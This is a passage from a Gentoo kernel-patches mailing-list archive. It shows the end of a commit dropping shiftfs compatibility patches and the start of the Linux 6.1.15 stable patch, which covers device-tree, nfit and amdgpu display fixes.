--			err = vfs_create(ns, loweri_dir, lowerd_new, modei, excl);
-+			err = vfs_create(&init_user_ns, loweri_dir, lowerd_new, modei, excl);
- 			break;
- 		case S_IFLNK:
--			err = vfs_symlink(ns, loweri_dir, lowerd_new, symlink);
-+			err = vfs_symlink(&init_user_ns, loweri_dir, lowerd_new, symlink);
- 			break;
- 		case S_IFSOCK:
- 			/* fall through */
- 		case S_IFIFO:
--			err = vfs_mknod(ns, loweri_dir, lowerd_new, modei, 0);
-+			err = vfs_mknod(&init_user_ns, loweri_dir, lowerd_new, modei, 0);
- 			break;
- 		default:
- 			err = -EINVAL;
-@@ -545,7 +543,7 @@ static int shiftfs_create(struct user_namespace *ns,
- {
- 	mode |= S_IFREG;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, excl);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, excl);
- }
- 
- static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
-@@ -553,13 +551,13 @@ static int shiftfs_mkdir(struct user_namespace *ns, struct inode *dir, struct de
- {
- 	mode |= S_IFDIR;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_link(struct dentry *hardlink, struct inode *dir,
- 			struct dentry *dentry)
- {
--	return shiftfs_create_object(&init_user_ns, dir, dentry, 0, NULL, hardlink, false);
-+	return shiftfs_create_object(dir, dentry, 0, NULL, hardlink, false);
- }
- 
- static int shiftfs_mknod(struct user_namespace *ns,
-@@ -569,13 +567,13 @@ static int shiftfs_mknod(struct user_namespace *ns,
- 	if (!S_ISFIFO(mode) && !S_ISSOCK(mode))
- 		return -EPERM;
- 
--	return shiftfs_create_object(ns, dir, dentry, mode, NULL, NULL, false);
-+	return shiftfs_create_object(dir, dentry, mode, NULL, NULL, false);
- }
- 
- static int shiftfs_symlink(struct user_namespace *ns, struct inode *dir, struct dentry *dentry,
- 			   const char *symlink)
- {
--	return shiftfs_create_object(ns, dir, dentry, S_IFLNK, symlink, NULL, false);
-+	return shiftfs_create_object(dir, dentry, S_IFLNK, symlink, NULL, false);
- }
- 
- static int shiftfs_rm(struct inode *dir, struct dentry *dentry, bool rmdir)
-@@ -716,12 +714,12 @@ static int shiftfs_permission(struct user_namespace *ns, struct inode *inode, in
- 		return -ECHILD;
- 	}
- 
--	err = generic_permission(ns, inode, mask);
-+	err = generic_permission(&init_user_ns, inode, mask);
- 	if (err)
- 		return err;
- 
- 	oldcred = shiftfs_override_creds(inode->i_sb);
--	err = inode_permission(ns, loweri, mask);
-+	err = inode_permission(&init_user_ns, loweri, mask);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -760,7 +758,7 @@ static int shiftfs_tmpfile(struct user_namespace *ns,
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
-@@ -776,7 +774,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 	struct shiftfs_super_info *sbinfo = sb->s_fs_info;
- 	int err;
- 
--	err = setattr_prepare(ns, dentry, attr);
-+	err = setattr_prepare(&init_user_ns, dentry, attr);
- 	if (err)
- 		return err;
- 
-@@ -793,7 +791,7 @@ static int shiftfs_setattr(struct user_namespace *ns, struct dentry *dentry, str
- 
- 	inode_lock(loweri);
- 	oldcred = shiftfs_override_creds(dentry->d_sb);
--	err = notify_change(ns, lowerd, &newattr, NULL);
-+	err = notify_change(&init_user_ns, lowerd, &newattr, NULL);
- 	revert_creds(oldcred);
- 	inode_unlock(loweri);
- 
-@@ -980,10 +978,10 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		shift_acl_xattr_ids(inode->i_sb->s_user_ns,
- 				    loweri->i_sb->s_user_ns,
- 				    (void *)value, size);
--		err = shiftfs_setxattr(ns, dentry, inode, handler->name, value,
-+		err = shiftfs_setxattr(dentry, inode, handler->name, value,
- 				       size, flags);
- 	} else {
--		err = shiftfs_removexattr(ns, dentry, handler->name);
-+		err = shiftfs_removexattr(&init_user_ns, dentry, handler->name);
- 	}
- 
- 	if (!err)
--- 
-2.39.2
-
-From 3d0ac0887b4a57d883d194a6836501fa77aaf6e3 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Wed, 27 Apr 2022 18:20:41 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix missing include required in 5.18
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 1 +
- 1 file changed, 1 insertion(+)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a21624c529f0..a5338dc6290c 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -21,6 +21,7 @@
- #include <linux/posix_acl_xattr.h>
- #include <linux/uio.h>
- #include <linux/fiemap.h>
-+#include <linux/pagemap.h>
- 
- struct shiftfs_super_info {
- 	struct vfsmount *mnt;
--- 
-2.39.2
-
-From 6cbfd564842eeb9adb495a3de704d125418825f9 Mon Sep 17 00:00:00 2001
-From: Andrea Righi <andrea.righi@canonical.com>
-Date: Tue, 18 Oct 2022 17:09:12 +0200
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: support kernel 6.1
-Cc: mpagano@gentoo.org
-
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 5 ++---
- 1 file changed, 2 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index a5338dc6290c..34f080ae0fec 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -747,19 +747,18 @@ static int shiftfs_fiemap(struct inode *inode,
- }
- 
- static int shiftfs_tmpfile(struct user_namespace *ns,
--			   struct inode *dir, struct dentry *dentry,
-+			   struct inode *dir, struct file *file,
- 			   umode_t mode)
- {
- 	int err;
- 	const struct cred *oldcred;
--	struct dentry *lowerd = dentry->d_fsdata;
- 	struct inode *loweri = dir->i_private;
- 
- 	if (!loweri->i_op->tmpfile)
- 		return -EOPNOTSUPP;
- 
- 	oldcred = shiftfs_override_creds(dir->i_sb);
--	err = loweri->i_op->tmpfile(&init_user_ns, loweri, lowerd, mode);
-+	err = loweri->i_op->tmpfile(&init_user_ns, loweri, file, mode);
- 	revert_creds(oldcred);
- 
- 	return err;
--- 
-2.39.2
-
-From 63014ad24c3b175e503324461ded0a6a8ed12ab6 Mon Sep 17 00:00:00 2001
-From: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Date: Tue, 31 Jan 2023 17:11:48 +0100
-Subject: [PATCH] UBUNTU: SAUCE: shiftfs: fix -EOVERFLOW inside the container
-Cc: mpagano@gentoo.org
-
-BugLink: https://bugs.launchpad.net/bugs/1990849
-
-We haven't supported idmapped layers with shiftfs and moreover, that makes
-no sense. Once lower fs support idmapped mounts when shiftfs is not needed.
-
-Starting from linux-image-5.15.0-48-generic users started seeing EOVERFLOW
-errors from the userspace side on a trivial fs operations inside the containers.
-
-This is caused by patches ("fs: tweak fsuidgid_has_mapping()"),
-("fs: support mapped mounts of mapped filesystems"). These patches extends
-and enables idmapped mounts support in Ubuntu kernel, but the problem is
-that shiftfs was not properly ported.
-
-See also:
-("namei: prepare for idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-15-christian.brauner@ubuntu.com/
-("overlayfs: do not mount on top of idmapped mounts")
-https://lore.kernel.org/all/20210121131959.646623-29-christian.brauner@ubuntu.com/
-as a reference.
-
-This patch should be appied on top of kinetic/master-next and based on the
-changes by Andrea Righi 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-
-This commit together with 4c934edc66 ("UBUNTU: SAUCE: shiftfs: always rely on init_user_ns")
-have to be ported to the jammy tree too.
-
-Fixes: d347e71d2c0 ("UBUNTU: [SAUCE] shiftfs: support kernel 5.15")
-Reported-by: Thomas Parrott <thomas.parrott@canonical.com>
-Signed-off-by: Alexander Mikhalitsyn <aleksandr.mikhalitsyn@canonical.com>
-Acked-by: Tim Gardner <tim.gardner@canonical.com>
-Acked-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Andrea Righi <andrea.righi@canonical.com>
-Signed-off-by: Mike Pagano <mpagano@gentoo.org>
----
- fs/shiftfs.c | 16 +++++++++++++---
- 1 file changed, 13 insertions(+), 3 deletions(-)
-
-diff --git a/fs/shiftfs.c b/fs/shiftfs.c
-index cda74b614505..2664e1fb65d3 100644
---- a/fs/shiftfs.c
-+++ b/fs/shiftfs.c
-@@ -632,10 +632,10 @@ static int shiftfs_rename(struct user_namespace *ns,
- 	struct inode *loweri_dir_old = lowerd_dir_old->d_inode,
- 		     *loweri_dir_new = lowerd_dir_new->d_inode;
- 	struct renamedata rd = {
--		.old_mnt_userns	= ns,
-+		.old_mnt_userns	= &init_user_ns,
- 		.old_dir	= loweri_dir_old,
- 		.old_dentry	= lowerd_old,
--		.new_mnt_userns	= ns,
-+		.new_mnt_userns	= &init_user_ns,
- 		.new_dir	= loweri_dir_new,
- 		.new_dentry	= lowerd_new,
- 	};
-@@ -971,7 +971,7 @@ shiftfs_posix_acl_xattr_set(const struct xattr_handler *handler,
- 		return -EOPNOTSUPP;
- 	if (handler->flags == ACL_TYPE_DEFAULT && !S_ISDIR(inode->i_mode))
- 		return value ? -EACCES : 0;
--	if (!inode_owner_or_capable(ns, inode))
-+	if (!inode_owner_or_capable(&init_user_ns, inode))
- 		return -EPERM;
- 
- 	if (value) {
-@@ -2015,6 +2015,16 @@ static int shiftfs_fill_super(struct super_block *sb, void *raw_data,
- 		goto out_put_path;
- 	}
- 
-+	/*
-+	 * It makes no sense to handle idmapped layers from shiftfs.
-+	 * And we didn't support it properly anyway.
-+	 */
-+	if (is_idmapped_mnt(path.mnt)) {
-+		err = -EINVAL;
-+		pr_err("idmapped layers are currently not supported\n");
-+		goto out_put_path;
-+	}
-+
- 	sb->s_flags |= SB_POSIXACL;
- 
- 	if (sbinfo->mark) {
--- 
-2.39.2
-


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-03 12:28 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-03 12:28 UTC (permalink / raw
  To: gentoo-commits

commit:     cc989ca8dddb899405562c2fe5e9567d03aee7fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 12:28:17 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 12:28:17 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=cc989ca8

Linux patch 6.1.15

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1014_linux-6.1.15.patch | 1648 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 1652 insertions(+)

diff --git a/0000_README b/0000_README
index aa47ca9b..328fcd23 100644
--- a/0000_README
+++ b/0000_README
@@ -99,6 +99,10 @@ Patch:  1013_linux-6.1.14.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.14
 
+Patch:  1014_linux-6.1.15.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.15
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1014_linux-6.1.15.patch b/1014_linux-6.1.15.patch
new file mode 100644
index 00000000..03dcc23c
--- /dev/null
+++ b/1014_linux-6.1.15.patch
@@ -0,0 +1,1648 @@
+diff --git a/Documentation/trace/ftrace.rst b/Documentation/trace/ftrace.rst
+index 60bceb018d6a9..21f01d32c9598 100644
+--- a/Documentation/trace/ftrace.rst
++++ b/Documentation/trace/ftrace.rst
+@@ -2940,7 +2940,7 @@ Produces::
+               bash-1994  [000] ....  4342.324898: ima_get_action <-process_measurement
+               bash-1994  [000] ....  4342.324898: ima_match_policy <-ima_get_action
+               bash-1994  [000] ....  4342.324899: do_truncate <-do_last
+-              bash-1994  [000] ....  4342.324899: should_remove_suid <-do_truncate
++              bash-1994  [000] ....  4342.324899: setattr_should_drop_suidgid <-do_truncate
+               bash-1994  [000] ....  4342.324899: notify_change <-do_truncate
+               bash-1994  [000] ....  4342.324900: current_fs_time <-notify_change
+               bash-1994  [000] ....  4342.324900: current_kernel_time <-current_fs_time
+diff --git a/Makefile b/Makefile
+index 3e82a32243626..4dfe902b7f193 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 14
++SUBLEVEL = 15
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/rk3288.dtsi b/arch/arm/boot/dts/rk3288.dtsi
+index 487b0e03d4b43..2ca76b69add78 100644
+--- a/arch/arm/boot/dts/rk3288.dtsi
++++ b/arch/arm/boot/dts/rk3288.dtsi
+@@ -1181,6 +1181,7 @@
+ 		clock-names = "dp", "pclk";
+ 		phys = <&edp_phy>;
+ 		phy-names = "dp";
++		power-domains = <&power RK3288_PD_VIO>;
+ 		resets = <&cru SRST_EDP>;
+ 		reset-names = "dp";
+ 		rockchip,grf = <&grf>;
+diff --git a/arch/arm/boot/dts/stihxxx-b2120.dtsi b/arch/arm/boot/dts/stihxxx-b2120.dtsi
+index 2aa94605d3d47..d52a7aaa10743 100644
+--- a/arch/arm/boot/dts/stihxxx-b2120.dtsi
++++ b/arch/arm/boot/dts/stihxxx-b2120.dtsi
+@@ -178,7 +178,7 @@
+ 				tsin-num = <0>;
+ 				serial-not-parallel;
+ 				i2c-bus = <&ssc2>;
+-				reset-gpios = <&pio15 4 GPIO_ACTIVE_HIGH>;
++				reset-gpios = <&pio15 4 GPIO_ACTIVE_LOW>;
+ 				dvb-card = <STV0367_TDA18212_NIMA_1>;
+ 			};
+ 		};
+diff --git a/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts b/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
+index aa22a0c222655..5d5d9574088ca 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3328-roc-cc.dts
+@@ -96,7 +96,6 @@
+ 			linux,default-trigger = "heartbeat";
+ 			gpios = <&rk805 1 GPIO_ACTIVE_LOW>;
+ 			default-state = "on";
+-			mode = <0x23>;
+ 		};
+ 
+ 		user_led: led-1 {
+@@ -104,7 +103,6 @@
+ 			linux,default-trigger = "mmc1";
+ 			gpios = <&rk805 0 GPIO_ACTIVE_LOW>;
+ 			default-state = "off";
+-			mode = <0x05>;
+ 		};
+ 	};
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi b/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
+index 6e29e74f6fc68..783120e9cebeb 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk3399-op1-opp.dtsi
+@@ -111,7 +111,7 @@
+ 		};
+ 	};
+ 
+-	dmc_opp_table: dmc_opp_table {
++	dmc_opp_table: opp-table-3 {
+ 		compatible = "operating-points-v2";
+ 
+ 		opp00 {
+diff --git a/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts b/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
+index 2e058c3150256..fccc2b2f327df 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3399-pinephone-pro.dts
+@@ -83,6 +83,13 @@
+ 	};
+ };
+ 
++&cpu_alert0 {
++	temperature = <65000>;
++};
++&cpu_alert1 {
++	temperature = <68000>;
++};
++
+ &cpu_l0 {
+ 	cpu-supply = <&vdd_cpu_l>;
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+index 44313a18e484e..bab46db2b18cd 100644
+--- a/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
++++ b/arch/arm64/boot/dts/rockchip/rk3568-rock-3a.dts
+@@ -521,6 +521,8 @@
+ };
+ 
+ &i2s1_8ch {
++	pinctrl-names = "default";
++	pinctrl-0 = <&i2s1m0_sclktx &i2s1m0_lrcktx &i2s1m0_sdi0 &i2s1m0_sdo0>;
+ 	rockchip,trcm-sync-tx-only;
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/rockchip/rk356x.dtsi b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+index 164708f1eb674..1d423daae971b 100644
+--- a/arch/arm64/boot/dts/rockchip/rk356x.dtsi
++++ b/arch/arm64/boot/dts/rockchip/rk356x.dtsi
+@@ -966,6 +966,7 @@
+ 		clock-names = "aclk_mst", "aclk_slv",
+ 			      "aclk_dbi", "pclk", "aux";
+ 		device_type = "pci";
++		#interrupt-cells = <1>;
+ 		interrupt-map-mask = <0 0 0 7>;
+ 		interrupt-map = <0 0 0 1 &pcie_intc 0>,
+ 				<0 0 0 2 &pcie_intc 1>,
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+index 7069f51bc120e..99136adb1857f 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb0_hsphy0>, <&usb0_ssphy0>;
+ };
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+index a3cfa8113ffb2..4c960f455461c 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb1_hsphy0>, <&usb1_ssphy0>;
+ };
+diff --git a/arch/powerpc/Kconfig b/arch/powerpc/Kconfig
+index 2ca5418457ed2..2b1141645d9e1 100644
+--- a/arch/powerpc/Kconfig
++++ b/arch/powerpc/Kconfig
+@@ -161,7 +161,6 @@ config PPC
+ 	select ARCH_WANT_IRQS_OFF_ACTIVATE_MM
+ 	select ARCH_WANT_LD_ORPHAN_WARN
+ 	select ARCH_WANTS_MODULES_DATA_IN_VMALLOC	if PPC_BOOK3S_32 || PPC_8xx
+-	select ARCH_WANTS_NO_INSTR
+ 	select ARCH_WEAK_RELEASE_ACQUIRE
+ 	select BINFMT_ELF
+ 	select BUILDTIME_TABLE_SORT
+diff --git a/arch/x86/include/asm/intel-family.h b/arch/x86/include/asm/intel-family.h
+index 347707d459c67..cbaf174d8efd9 100644
+--- a/arch/x86/include/asm/intel-family.h
++++ b/arch/x86/include/asm/intel-family.h
+@@ -123,6 +123,8 @@
+ #define INTEL_FAM6_METEORLAKE		0xAC
+ #define INTEL_FAM6_METEORLAKE_L		0xAA
+ 
++#define INTEL_FAM6_LUNARLAKE_M		0xBD
++
+ /* "Small Core" Processors (Atom/E-Core) */
+ 
+ #define INTEL_FAM6_ATOM_BONNELL		0x1C /* Diamondville, Pineview */
+diff --git a/drivers/acpi/nfit/core.c b/drivers/acpi/nfit/core.c
+index ae5f4acf26753..6d4ac934cd499 100644
+--- a/drivers/acpi/nfit/core.c
++++ b/drivers/acpi/nfit/core.c
+@@ -3297,8 +3297,8 @@ void acpi_nfit_shutdown(void *data)
+ 
+ 	mutex_lock(&acpi_desc->init_mutex);
+ 	set_bit(ARS_CANCEL, &acpi_desc->scrub_flags);
+-	cancel_delayed_work_sync(&acpi_desc->dwork);
+ 	mutex_unlock(&acpi_desc->init_mutex);
++	cancel_delayed_work_sync(&acpi_desc->dwork);
+ 
+ 	/*
+ 	 * Bounce the nvdimm bus lock to make sure any in-flight
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index e9c4f22696c5c..a930b1873f2a4 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -147,14 +147,6 @@ MODULE_FIRMWARE(FIRMWARE_NAVI12_DMCU);
+ /* Number of bytes in PSP footer for firmware. */
+ #define PSP_FOOTER_BYTES 0x100
+ 
+-/*
+- * DMUB Async to Sync Mechanism Status
+- */
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_FAIL 1
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT 2
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS 3
+-#define DMUB_ASYNC_TO_SYNC_ACCESS_INVALID 4
+-
+ /**
+  * DOC: overview
+  *
+@@ -1456,6 +1448,7 @@ static int amdgpu_dm_init(struct amdgpu_device *adev)
+ 	memset(&init_params, 0, sizeof(init_params));
+ #endif
+ 
++	mutex_init(&adev->dm.dpia_aux_lock);
+ 	mutex_init(&adev->dm.dc_lock);
+ 	mutex_init(&adev->dm.audio_lock);
+ 	spin_lock_init(&adev->dm.vblank_lock);
+@@ -1816,6 +1809,7 @@ static void amdgpu_dm_fini(struct amdgpu_device *adev)
+ 
+ 	mutex_destroy(&adev->dm.audio_lock);
+ 	mutex_destroy(&adev->dm.dc_lock);
++	mutex_destroy(&adev->dm.dpia_aux_lock);
+ 
+ 	return;
+ }
+@@ -10200,91 +10194,95 @@ uint32_t dm_read_reg_func(const struct dc_context *ctx, uint32_t address,
+ 	return value;
+ }
+ 
+-static int amdgpu_dm_set_dmub_async_sync_status(bool is_cmd_aux,
+-						struct dc_context *ctx,
+-						uint8_t status_type,
+-						uint32_t *operation_result)
++int amdgpu_dm_process_dmub_aux_transfer_sync(
++		struct dc_context *ctx,
++		unsigned int link_index,
++		struct aux_payload *payload,
++		enum aux_return_code_type *operation_result)
+ {
+ 	struct amdgpu_device *adev = ctx->driver_context;
+-	int return_status = -1;
+ 	struct dmub_notification *p_notify = adev->dm.dmub_notify;
++	int ret = -1;
+ 
+-	if (is_cmd_aux) {
+-		if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS) {
+-			return_status = p_notify->aux_reply.length;
+-			*operation_result = p_notify->result;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT) {
+-			*operation_result = AUX_RET_ERROR_TIMEOUT;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_FAIL) {
+-			*operation_result = AUX_RET_ERROR_ENGINE_ACQUIRE;
+-		} else if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_INVALID) {
+-			*operation_result = AUX_RET_ERROR_INVALID_REPLY;
+-		} else {
+-			*operation_result = AUX_RET_ERROR_UNKNOWN;
++	mutex_lock(&adev->dm.dpia_aux_lock);
++	if (!dc_process_dmub_aux_transfer_async(ctx->dc, link_index, payload)) {
++		*operation_result = AUX_RET_ERROR_ENGINE_ACQUIRE;
++		goto out;
++ 	}
++
++	if (!wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ)) {
++		DRM_ERROR("wait_for_completion_timeout timeout!");
++		*operation_result = AUX_RET_ERROR_TIMEOUT;
++		goto out;
++	}
++
++	if (p_notify->result != AUX_RET_SUCCESS) {
++		/*
++		 * Transient states before tunneling is enabled could
++		 * lead to this error. We can ignore this for now.
++		 */
++		if (p_notify->result != AUX_RET_ERROR_PROTOCOL_ERROR) {
++			DRM_WARN("DPIA AUX failed on 0x%x(%d), error %d\n",
++					payload->address, payload->length,
++					p_notify->result);
+ 		}
+-	} else {
+-		if (status_type == DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS) {
+-			return_status = 0;
+-			*operation_result = p_notify->sc_status;
+-		} else {
+-			*operation_result = SET_CONFIG_UNKNOWN_ERROR;
++		*operation_result = AUX_RET_ERROR_INVALID_REPLY;
++		goto out;
++	}
++
++
++	payload->reply[0] = adev->dm.dmub_notify->aux_reply.command;
++	if (!payload->write && p_notify->aux_reply.length &&
++			(payload->reply[0] == AUX_TRANSACTION_REPLY_AUX_ACK)) {
++
++		if (payload->length != p_notify->aux_reply.length) {
++			DRM_WARN("invalid read length %d from DPIA AUX 0x%x(%d)!\n",
++				p_notify->aux_reply.length,
++					payload->address, payload->length);
++			*operation_result = AUX_RET_ERROR_INVALID_REPLY;
++			goto out;
+ 		}
++
++		memcpy(payload->data, p_notify->aux_reply.data,
++				p_notify->aux_reply.length);
+ 	}
+ 
+-	return return_status;
++	/* success */
++	ret = p_notify->aux_reply.length;
++	*operation_result = p_notify->result;
++out:
++	reinit_completion(&adev->dm.dmub_aux_transfer_done);
++	mutex_unlock(&adev->dm.dpia_aux_lock);
++	return ret;
+ }
+ 
+-int amdgpu_dm_process_dmub_aux_transfer_sync(bool is_cmd_aux, struct dc_context *ctx,
+-	unsigned int link_index, void *cmd_payload, void *operation_result)
++int amdgpu_dm_process_dmub_set_config_sync(
++		struct dc_context *ctx,
++		unsigned int link_index,
++		struct set_config_cmd_payload *payload,
++		enum set_config_status *operation_result)
+ {
+ 	struct amdgpu_device *adev = ctx->driver_context;
+-	int ret = 0;
++	bool is_cmd_complete;
++	int ret;
+ 
+-	if (is_cmd_aux) {
+-		dc_process_dmub_aux_transfer_async(ctx->dc,
+-			link_index, (struct aux_payload *)cmd_payload);
+-	} else if (dc_process_dmub_set_config_async(ctx->dc, link_index,
+-					(struct set_config_cmd_payload *)cmd_payload,
+-					adev->dm.dmub_notify)) {
+-		return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-					ctx, DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS,
+-					(uint32_t *)operation_result);
+-	}
++	mutex_lock(&adev->dm.dpia_aux_lock);
++	is_cmd_complete = dc_process_dmub_set_config_async(ctx->dc,
++			link_index, payload, adev->dm.dmub_notify);
+ 
+-	ret = wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ);
+-	if (ret == 0) {
++	if (is_cmd_complete || wait_for_completion_timeout(&adev->dm.dmub_aux_transfer_done, 10 * HZ)) {
++		ret = 0;
++		*operation_result = adev->dm.dmub_notify->sc_status;
++	} else {
+ 		DRM_ERROR("wait_for_completion_timeout timeout!");
+-		return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-				ctx, DMUB_ASYNC_TO_SYNC_ACCESS_TIMEOUT,
+-				(uint32_t *)operation_result);
+-	}
+-
+-	if (is_cmd_aux) {
+-		if (adev->dm.dmub_notify->result == AUX_RET_SUCCESS) {
+-			struct aux_payload *payload = (struct aux_payload *)cmd_payload;
+-
+-			payload->reply[0] = adev->dm.dmub_notify->aux_reply.command;
+-			if (!payload->write && adev->dm.dmub_notify->aux_reply.length &&
+-			    payload->reply[0] == AUX_TRANSACTION_REPLY_AUX_ACK) {
+-
+-				if (payload->length != adev->dm.dmub_notify->aux_reply.length) {
+-					DRM_WARN("invalid read from DPIA AUX %x(%d) got length %d!\n",
+-							payload->address, payload->length,
+-							adev->dm.dmub_notify->aux_reply.length);
+-					return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux, ctx,
+-							DMUB_ASYNC_TO_SYNC_ACCESS_INVALID,
+-							(uint32_t *)operation_result);
+-				}
+-
+-				memcpy(payload->data, adev->dm.dmub_notify->aux_reply.data,
+-				       adev->dm.dmub_notify->aux_reply.length);
+-			}
+-		}
++		ret = -1;
++		*operation_result = SET_CONFIG_UNKNOWN_ERROR;
+ 	}
+ 
+-	return amdgpu_dm_set_dmub_async_sync_status(is_cmd_aux,
+-			ctx, DMUB_ASYNC_TO_SYNC_ACCESS_SUCCESS,
+-			(uint32_t *)operation_result);
++	if (!is_cmd_complete)
++		reinit_completion(&adev->dm.dmub_aux_transfer_done);
++	mutex_unlock(&adev->dm.dpia_aux_lock);
++	return ret;
+ }
+ 
+ /*
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+index 635c398fcefe7..ac26e917240b9 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.h
+@@ -59,7 +59,9 @@
+ #include "signal_types.h"
